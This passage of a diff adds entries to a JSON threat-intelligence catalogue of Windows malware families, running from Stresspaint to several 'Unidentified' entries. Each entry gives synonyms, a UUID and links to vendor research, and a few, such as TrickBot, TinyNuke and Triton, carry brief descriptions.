"https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/", + "https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/" + ] + }, + "uuid": "00dedcea-4f87-4b6d-b12d-7749281b1366", + "value": "Stresspaint", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity", + "https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/", + "https://twitter.com/physicaldrive0/status/786293008278970368", + "https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/", + "https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/" + ] + }, + "uuid": "da2969f2-01e9-4ca8-b2f3-5fc9a9891d57", + "value": "StrongPity", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet", + "http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html" + ] + }, + "uuid": "6ad84f52-0025-4a9d-861a-65c870f47988", + "value": "Stuxnet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sunorcal", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/index.html" + ] + }, + "uuid": "a51b82ba-7e32-4a8e-b5d0-8d0441bdcce4", + "value": "SunOrcal", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.suppobox" + ] + }, + "uuid": "dd9939a4-df45-4c7c-8a8d-83b40766aacd", + "value": "SuppoBox", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.swift", + "https://securelist.com/blog/sas/77908/lazarus-under-the-hood/" + ] + }, + "uuid": "8420653b-1412-45a1-9a2d-6aa9b9eaf906", + "value": "Swift?", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sword", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2112870f-06f1-44a9-9c43-6cc4fb90e295", + "value": "Sword", + "description": "" + }, + { + "meta": { + "synonyms": [ + "getkys" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sykipot", + "https://www.symantec.com/connect/blogs/sykipot-attacks", + "https://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/blogs/labs-research/sykipot-is-back", + "https://community.rsa.com/thread/185437" + ] + }, + "uuid": "99ffeb75-8d21-43a2-b5f7-f58bcbac2228", + "value": "sykipot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", + "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" + ] + }, + "uuid": "a396a0bb-6dc5-424a-bdbd-f8ba808ca2c2", + "value": "SynAck", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synccrypt", + "https://www.bleepingcomputer.com/news/security/synccrypt-ransomware-hides-inside-jpg-files-appends-kk-extension/" + ] + }, + "uuid": "e717a26d-17aa-4cd7-88de-dc75aa365232", + "value": "SyncCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "d327b4d9-e1c8-4c71-b9fe-775d1607e7d4", + "value": "SynFlooder", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader" + ] + }, + "uuid": "ffd74637-b518-4622-939b-c0669a81f3a9", + "value": "Synth Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sys10", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/", + "https://securelist.com/files/2015/05/TheNaikonAPT-MsnMM1.pdf" + ] + }, + "uuid": "2ae57534-6aac-4025-8d93-888dab112b45", + "value": "Sys10", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon", + "http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/" + ] + }, + "uuid": "4f079a71-bb1b-47b6-a6d0-26a37cd8a3a6", + "value": "Syscon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + ] + }, + "uuid": "a4b9c526-42d0-4de9-ab8e-e78f99655d11", + "value": "SysGet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan" + ] + }, + "uuid": "7007b268-f6f4-4a01-9184-fc2334461c38", + "value": "SysScan", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", + "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", + "https://www.secureworks.com/research/srizbi", + "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel" + ] + }, + "uuid": "66b1094f-7779-43ad-a32b-a9414babcc76", + "value": "Szribi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tabmsgsql", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "48aa9c41-f420-418b-975c-1fb6e2a91145", + "value": "TabMsgSQL", + "description": "" + }, + { + "meta": { + "synonyms": [ + "simbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taidoor", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the_taidoor_campaign.pdf", + "http://contagiodump.blogspot.com/2011/10/sep-28-cve-2010-3333-manuscript-with.html" + ] + }, + "uuid": "94323b32-9566-450b-8480-5f9f53b57948", + "value": "taidoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.taleret", + "https://www.fireeye.com/blog/threat-research/2013/09/evasive-tactics-taidoor-3.html", + "http://contagioexchange.blogspot.com/2013/08/taleret-strings-apt-1.html" + ] + }, + "uuid": "b0467c03-824f-4071-8668-f056110d2a50", + "value": "Taleret", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy" + ] + }, + "uuid": "88ff523e-206b-4918-8c93-e2829427eef2", + "value": "Tandfuy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux", + "https://securelist.com/files/2014/11/darkhotel_kl_07.11.pdf" + ] + }, + "uuid": "71e77349-98f5-49c6-bff7-6ed3b3d79410", + "value": "Tapaoux", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "ea6a62b2-db33-4d60-9823-5117c20b6457", + "value": "Tarsip", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf" + ] + }, + "uuid": "bbbf4786-1aba-40ac-8ad7-c9d8c66197a8", + "value": "tDiscoverer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess", + "http://www.clearskysec.com/tulip/" + ] + }, + "uuid": "99d83ee8-6870-4af2-a3c8-cf86baff7cb3", + "value": "TDTESS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "06e0d676-8160-4b65-b6ea-d7634c962809", + "value": "TeleBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teledoor", + "https://www.welivesecurity.com/2017/07/04/analysis-of-telebots-cunning-backdoor/", + "http://blog.talosintelligence.com/2017/07/the-medoc-connection.html" + ] + }, + "uuid": "b71f1656-975a-4daa-8109-00c30fd20410", + "value": "TeleDoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve" + ] + }, + "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", + "value": "Tempedreve", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Fakem RAT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.terminator_rat", + "https://www.welivesecurity.com/wp-content/uploads/2014/01/Advanced-Persistent-Threats.pdf", + "https://malware.lu/assets/files/articles/RAP002_APT1_Technical_backstage.1.0.pdf", + "https://documents.trendmicro.com/assets/wp/wp-fakem-rat.pdf", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "b127028b-ecb1-434b-abea-e4df3ca458b9", + "value": "Terminator RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "cryptesla" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.teslacrypt", + "https://blogs.cisco.com/security/talos/teslacrypt", + "https://securelist.com/teslacrypt-2-0-disguised-as-cryptowall/71371/", + "https://success.trendmicro.com/solution/1113900-emerging-threat-on-ransom-cryptesla", + "https://researchcenter.paloaltonetworks.com/2015/10/latest-teslacrypt-ransomware-borrows-code-from-carberp-trojan/", + "https://blog.malwarebytes.com/threat-analysis/2016/03/teslacrypt-spam-campaign-unpaid-issue/", + "https://blog.checkpoint.com/wp-content/uploads/2016/05/Tesla-crypt-whitepaper_V3.pdf", + "https://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/", + "https://www.endgame.com/blog/technical-blog/your-package-has-been-successfully-encrypted-teslacrypt-41a-and-malware-attack" + ] + }, + "uuid": "bd79d5be-5c2f-45c1-ac99-0e755a61abad", + "value": "TeslaCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Alphabot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos", + "https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market" + ] + }, + "uuid": "24fabbe0-27a2-4c93-a6a6-c14767efaa25", + "value": "Thanatos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos_ransom", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-decryptor-released-by-the-cisco-talos-group/", + "https://www.bleepingcomputer.com/news/security/thanatos-ransomware-is-first-to-use-bitcoin-cash-messes-up-encryption/", + "https://blog.talosintelligence.com/2018/06/ThanatosDecryptor.html" + ] + }, + "uuid": "0884cf65-564e-4ee2-b4e5-b73f8bbd6a34", + "value": "Thanatos Ransomware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte", + "https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html" + ] + }, + "uuid": "d1752bcb-d9cb-4b4b-81f0-0658d76b4ce4", + "value": "ThreeByte", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief", + "http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/" + ] + }, + "uuid": "1df3b58a-e5d2-4d2a-869c-8d4532cc9f52", + "value": "ThumbThief", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" + ] + }, + "uuid": "e55dcdec-0365-4ee0-96f8-7021183845a3", + "value": "Thunker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tidepool", + "http://researchcenter.paloaltonetworks.com/2016/05/operation-ke3chang-resurfaces-with-new-tidepool-malware/", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf" + ] + }, + "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", + "value": "Tidepool", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Zusy", + "TinyBanker", + "Illi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba", + "http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/", + "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", + "https://labsblog.f-secure.com/2016/01/18/analyzing-tinba-configuration-data/", + "http://garage4hackers.com/entry.php?b=3086", + "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", + "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", + "http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html", + "https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/", + "http://contagiodump.blogspot.com/2012/06/amazon.html", + "http://www.theregister.co.uk/2012/06/04/small_banking_trojan/" + ] + }, + "uuid": "5eee35b6-bd21-4b67-b198-e9320fcf2c88", + "value": "Tinba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyloader", + "https://www.fidelissecurity.com/threatgeek/2017/07/deconstructing-tinyloader-0" + ] + }, + "uuid": "f7c26ca7-0a7b-41b8-ad55-06625be10144", + "value": "TinyLoader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "NukeBot", + "Nuclear Bot", + "MicroBankingTrojan", + "Xbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinynuke", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=4596", + "https://forums.juniper.net/t5/Threat-Research/Nukebot-Banking-Trojan-targeting-people-in-France/ba-p/326702", + "https://www.bitsighttech.com/blog/break-out-of-the-tinynuke-botnet", + "https://benkowlab.blogspot.de/2017/08/quick-look-at-another-alina-fork-xbot.html", + "https://securityintelligence.com/the-nukebot-trojan-a-bruised-ego-and-a-surprising-source-code-leak/", + "https://securelist.com/the-nukebot-banking-trojan-from-rough-drafts-to-real-threats/78957/", + "https://www.arbornetworks.com/blog/asert/dismantling-nuclear-bot/", + "https://krebsonsecurity.com/tag/nuclear-bot/" + ] + }, + "uuid": "5a78ec38-8b93-4dde-a99e-0c9b77674838", + "value": "TinyNuke", + "description": "TinyNuke (aka Nuclear Bot) is a fully-fledged banking trojan including HiddenDesktop/VNC server and a reverse socks4 server. It was for sale on underground marketplaces for $2500 in 2016. The program's author claimed the malware was written from scratch, but that it functioned similarly to the ZeuS banking trojan in that it could steal passwords and inject arbitrary content when victims visited banking Web sites. However, he then proceeded to destroy his own reputation on hacker forums by promoting his development too aggressively. As a displacement activity, he published his source code on Github. XBot is an off-spring of TinyNuke, but very similar to its ancestor." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinytyphon", + "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + ] + }, + "uuid": "d2414f4a-1eda-4d80-84d3-ed130ca14e3c", + "value": "TinyTyphon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyzbot", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", + "value": "TinyZbot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiop" + ] + }, + "uuid": "c34091df-0df2-4ef6-bf69-c67eb711f6d8", + "value": "Tiop", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Gheg" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tofsee", + "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.cert.pl/en/news/single/tofsee-en/", + "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/" + ] + }, + "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", + "value": "Tofsee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", + "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/", + "http://www.isightpartners.com/2014/08/analysis-torrentlocker-new-strain-malware-using-components-cryptolocker-cryptowall/" + ] + }, + "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", + "value": "TorrentLocker", + "description": "" + }, + { + "meta": { + "synonyms": [ + "huntpos" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.treasurehunter", + "http://adelmas.com/blog/treasurehunter.php", + "https://www.flashpoint-intel.com/blog/treasurehunter-source-code-leaked/", + "https://www.fireeye.com/blog/threat-research/2016/03/treasurehunt_a_cust.html" + ] + }, + "uuid": "f9d85edd-caa9-4134-9396-4575e70b10f2", + "value": "TreasureHunter", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trickster", + "TheTrick", + "TrickLoader" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trickbot", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://f5.com/labs/articles/threat-intelligence/malware/little-trickbot-growing-up-new-campaign-24412", + "http://www.vkremez.com/2017/12/lets-learn-introducing-new-trickbot.html", + "https://www.fidelissecurity.com/threatgeek/2016/10/trickbot-we-missed-you-dyre", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", + "https://www.youtube.com/watch?v=KMcSAlS9zGE", + "https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/", + "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", + "https://securityintelligence.com/trickbot-takes-to-latin-america-continues-to-expand-its-global-reach/", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://www.blueliv.com/research/trickbot-banking-trojan-using-eflags-as-an-anti-hook-technique/", + "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", + "https://blogs.forcepoint.com/security-labs/trickbot-spread-necurs-botnet-adds-nordic-countries-its-targets", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://escinsecurity.blogspot.de/2018/01/weekly-trickbot-analysis-end-of-wc-22.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "http://www.malware-traffic-analysis.net/2018/02/01/", + "http://blog.fortinet.com/2016/12/06/deep-analysis-of-the-online-banking-botnet-trickbot", + "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-3-core", + "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", + "https://www.youtube.com/watch?v=EdchPEHnohw", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://qmemcpy.github.io/post/reverse-engineering-malware-trickbot-part-1-packer", + "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/" + ] + }, + "uuid": "c824813c-9c79-4917-829a-af72529e8329", + "value": "TrickBot", + "description": "A financial Trojan believed to be a derivative of Dyre: the bot uses very similar code, web injects, and operational tactics. Has multiple modules including VNC and Socks5 Proxy. Uses SSL for C2 communication.\r\n\r\n- Q4 2016 - Detected in wild\r\nOct 2016 - 1st Report\r\nJan 2018 - Use XMRIG (Monero) miner\r\nFeb 2018 - Theft Bitcoin\r\nMar 2018 - Unfinished ransomware module\r\n\r\nInfection Vector\r\n1. Phish > Link MS Office > Macro Enabled > Downloader > Trickbot\r\n2. Phish > Attached MS Office > Marco Enabled > Downloader > Trickbot\r\n3. Phish > Attached MS Office > Marco enabled > Trickbot installed" + }, + { + "meta": { + "synonyms": [ + "Trisis", + "HatMan" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN" + ] + }, + "uuid": "79606b2b-72f0-41e3-8116-1093c1f94b15", + "value": "win.triton", + "description": "Malware attacking commonly used in Industrial Control Systems (ICS) Triconex Safety Instrumented System (SIS) controllers." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://github.com/5loyd/trochilus/" + ] + }, + "uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e", + "value": "Trochilus RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Shade" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", + "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "41acd50d-e602-41a9-85e7-c091fb4bc126", + "value": "Troldesh", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.trump_ransom" + ] + }, + "uuid": "48deadcc-1a67-442d-b181-fdaaa337c4bb", + "value": "Trump Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tsifiri" + ] + }, + "uuid": "3da6f62c-9e06-4e7b-8852-7c7689f65833", + "value": "Tsifiri", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + ] + }, + "uuid": "fab34d66-5668-460a-bc0f-250b9417cdbf", + "value": "TURNEDUP", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tyupkin", + "https://www.lastline.com/labsblog/tyupkin-atm-malware/" + ] + }, + "uuid": "c28e9055-b656-4b7a-aa91-fe478a83fe4c", + "value": "Tyupkin", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Akagi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", + "https://github.com/hfiref0x/UACME" + ] + }, + "uuid": "ccde5b0d-fe13-48e6-a6f4-4e434ce29371", + "value": "UACMe", + "description": "A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", + "https://blogs.forcepoint.com/security-labs/udpos-exfiltrating-credit-card-data-dns", + "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" + ] + }, + "uuid": "5d05d81d-a0f8-496d-9a80-9b04fe3019fc", + "value": "UDPoS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.uiwix", + "https://www.minerva-labs.com/post/uiwix-evasive-ransomware-exploiting-eternalblue" + ] + }, + "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", + "value": "Uiwix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_001" + ] + }, + "uuid": "72961adc-ace1-4593-99f1-266119ddeccb", + "value": "Unidentified 001", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_003" + ] + }, + "uuid": "0e435b5d-37df-47cc-a1c4-1afb82df83d1", + "value": "Unidentified 003", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_005" + ] + }, + "uuid": "", + "value": "", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_006" + ] + }, + "uuid": "c0a40d42-33bb-4eca-8121-f636aeec14c6", + "value": "Unidentified 006", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_013_korean_malware", + "http://blog.talosintelligence.com/2017/02/korean-maldoc.html" + ] + }, + "uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956", + "value": "Unidentified 013 (Korean)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_020_cia_vault7", + "https://wikileaks.org/ciav7p1/cms/page_34308128.html" + ] + }, + "uuid": "40c66571-164c-4050-9c84-f37c9cd84055", + "value": "Unidentified 020 (Vault7)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_022_ransom" + ] + }, + "uuid": "5424d89e-1b7a-4632-987b-67fd27621d6f", + "value": "Unidentified 022 (Ransom)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_023" + ] + }, + "uuid": "a936a595-f03d-4d8c-848e-2a3525c0415b", + "value": "Unidentified 023", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 